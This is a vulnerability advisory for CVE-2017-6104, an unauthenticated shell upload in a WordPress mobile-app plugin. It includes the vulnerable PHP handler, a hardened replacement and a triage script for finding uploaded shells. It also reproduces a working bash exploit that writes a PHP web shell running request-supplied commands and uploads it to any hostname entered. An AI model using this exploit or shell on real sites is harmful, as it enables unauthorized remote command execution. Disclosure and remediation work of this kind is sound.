WordPress Mobile App Native 3.0 Shell Upload

Related Vulnerabilities: CVE-2017-6104  
Publish Date: 02 Mar 2017

Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
Vulnerability Date: 2017-02-27
Download: https://wordpress.org/plugins/zen-mobile-app-native/
Vendor: https://profiles.wordpress.org/zendkmobileapp/
Notified: 2017-02-27
Vendor Contact: 
Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.
Vulnerability: The upload handler in ./zen-mobile-app-native/server/images.php neither requires authentication nor checks that the requester is allowed to upload content.
It also does not validate the uploaded file: the stored extension is copied verbatim from the client-supplied filename ($ext[1]) and the file is written into the web-accessible images/ directory, so an unauthenticated request can place executable code (for example a .php file) on the server.

<?php
//header('content-type: text/html; charset=iso-8859-2');
header('Content-Type: text/html; charset=utf-8');
header('Access-Control-Allow-Origin: *');
require_once('function.php');

if ($_FILES['file']['name']) {
    if (!$_FILES['file']['error']) {
        $name = md5(rand(100, 200));
        $ext = explode('.', $_FILES['file']['name']);
        $filename = $name . '.' . $ext[1];
        $destination = 'images/' . $filename;
        $location = $_FILES["file"]["tmp_name"];
        move_uploaded_file($location, $destination);
        echo $plugin_url.'/server/images/' . $filename;
    }
    else {
        echo $message = 'Ooops!  Your upload triggered the following error:  '.$_FILES['file']['error'];
    }
}
CVEIDs: CVE-2017-6104

URL: http://www.vapidlabs.com/advisory.php?v=178
Credit: Larry W. Cashdollar, @_larry0
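The following is an added example, not the plugin's code and not part of the advisory: a hardened replacement for the upload handler above, showing the three controls the original lacks (authorization, content validation, safe storage). It assumes the handler is wired into WordPress as an admin-ajax action so that current_user_can(), check_ajax_referer() and wp_upload_dir() are available; the action name and nonce name (zen_image_upload) are assumptions.

```php
<?php
// Added example (not the plugin's code). Assumes WordPress is loaded and this
// function is registered as an admin-ajax action; the action/nonce name
// 'zen_image_upload' is an assumption.

function zen_secure_image_upload(): void {
    // 1. Authorization: the original accepted uploads from anyone. Require a
    //    logged-in user with the upload_files capability and a valid nonce.
    if (!is_user_logged_in() || !current_user_can('upload_files')) {
        wp_send_json_error('forbidden', 403);
    }
    check_ajax_referer('zen_image_upload', '_ajax_nonce');

    if (empty($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
        wp_send_json_error('upload failed', 400);
    }
    $tmp = $_FILES['file']['tmp_name'];
    if (!is_uploaded_file($tmp)) {
        wp_send_json_error('invalid upload', 400);
    }

    // 2. Content validation: derive the extension from the file's bytes, never
    //    from the client-supplied name (the original used $ext[1] unchecked).
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmp);
    if (!isset($allowed[$mime]) || getimagesize($tmp) === false) {
        wp_send_json_error('only jpg, png and gif images are accepted', 415);
    }

    // 3. Storage: unpredictable name (the original used md5(rand(100, 200)),
    //    only 101 possible values), fixed extension, and the uploads directory
    //    rather than a directory inside the plugin.
    $name   = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $upload = wp_upload_dir();
    $dest   = trailingslashit($upload['basedir']) . 'zen-app/' . $name;
    wp_mkdir_p(dirname($dest));
    if (!move_uploaded_file($tmp, $dest)) {
        wp_send_json_error('could not store file', 500);
    }
    chmod($dest, 0644);

    wp_send_json_success(['url' => trailingslashit($upload['baseurl']) . 'zen-app/' . $name]);
}
add_action('wp_ajax_zen_image_upload', 'zen_secure_image_upload');
```

Registering only the wp_ajax_ hook (and not wp_ajax_nopriv_) means unauthenticated requests never reach the handler at all; the explicit capability check inside it is defence in depth. Validating the MIME type from the bytes and forcing the extension from an allowlist closes the path by which a .php file reached the images/ directory in the original code.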

EXPLOIT:

#!/bin/bash
# Exploit for the Wordpress Plugin Mobile App Native 3.0 file upload I posted.
# CVE-2017-6104
# Larry W. Cashdollar,@_larry0
# http://www.vapid.dhs.org/advisory.php?v=178

cat > shell.php << -EOF-
<?php
if(isset(\$_REQUEST['cmd'])){
        echo "<pre>";
        \$cmd = (\$_REQUEST['cmd']);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do
 echo -e ${red};
 echo -e "              Mobile App Native 3.0 File Upload PoC Redux $NC";
 echo "                                 3/1/2017";
 echo "                    Larry W. Cashdollar, @_larry0";
 echo
 echo "                           CVE-2017-6104";
 echo "- Advisory -";
 echo "http://www.vapid.dhs.org/advisory.php?v=178";
 echo
 echo "Ctrl ^C to exit";
 echo -n "Enter Target Hostname :";
 read target;
 echo "[+] Hostname $target";
 echo "[+] Exploiting Plugin";
 echo
 RESULT=`curl -# -F 'file=@shell.php' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`;
 echo "[==========================================================================]"
 echo $RESULT
 echo "[==========================================================================]"
done
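For sites that ran the vulnerable plugin, the question after the fact is whether anything was already uploaded. The following is an added triage script, not part of the advisory or the plugin: it walks the plugin's server/images/ directory (path taken from the advisory) and reports files that are not images of the kind their extension claims, carry an executable extension, or contain a PHP open tag. The output format and the list of image types checked are the example's own choices.

```php
<?php
// Added example, not the advisory's or the plugin's code. Run from the CLI:
//   php find-suspicious-uploads.php /path/to/wp-content/plugins/zen-mobile-app-native/server/images
// The directory argument is whatever path the plugin is installed under.

function zen_suspicious_files(string $dir): array {
    $findings   = [];
    $finfo      = new finfo(FILEINFO_MIME_TYPE);
    $imageTypes = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];

    foreach (new DirectoryIterator($dir) as $entry) {
        if ($entry->isDot() || !$entry->isFile()) {
            continue;
        }
        $path    = $entry->getPathname();
        $mime    = $finfo->file($path) ?: 'unknown';
        // Only the first 64 KiB is needed to spot a PHP tag in a small web shell.
        $head    = file_get_contents($path, false, null, 0, 65536);
        $reasons = [];

        // Extension came from the client in the vulnerable handler, so the
        // bytes are the only trustworthy signal of what the file really is.
        if (!in_array($mime, $imageTypes, true)) {
            $reasons[] = "content is not an image ($mime)";
        }
        if (preg_match('/\.(php\d?|phtml|phar)$/i', $path)) {
            $reasons[] = 'executable extension';
        }
        if ($head !== false && stripos($head, '<?php') !== false) {
            $reasons[] = 'contains a PHP open tag';
        }
        if ($reasons) {
            $findings[$path] = $reasons;
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $hits = zen_suspicious_files($argv[1]);
    if (!$hits) {
        echo "no suspicious files found\n";
    }
    foreach ($hits as $path => $reasons) {
        echo $path, ': ', implode('; ', $reasons), PHP_EOL;
    }
}
```

A hit on any of the three checks is worth treating as an incident indicator rather than just a file to delete: the web server's access log for POST requests to server/images.php, and for subsequent GET requests to server/images/, will show when the file arrived and what was requested from it afterwards.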
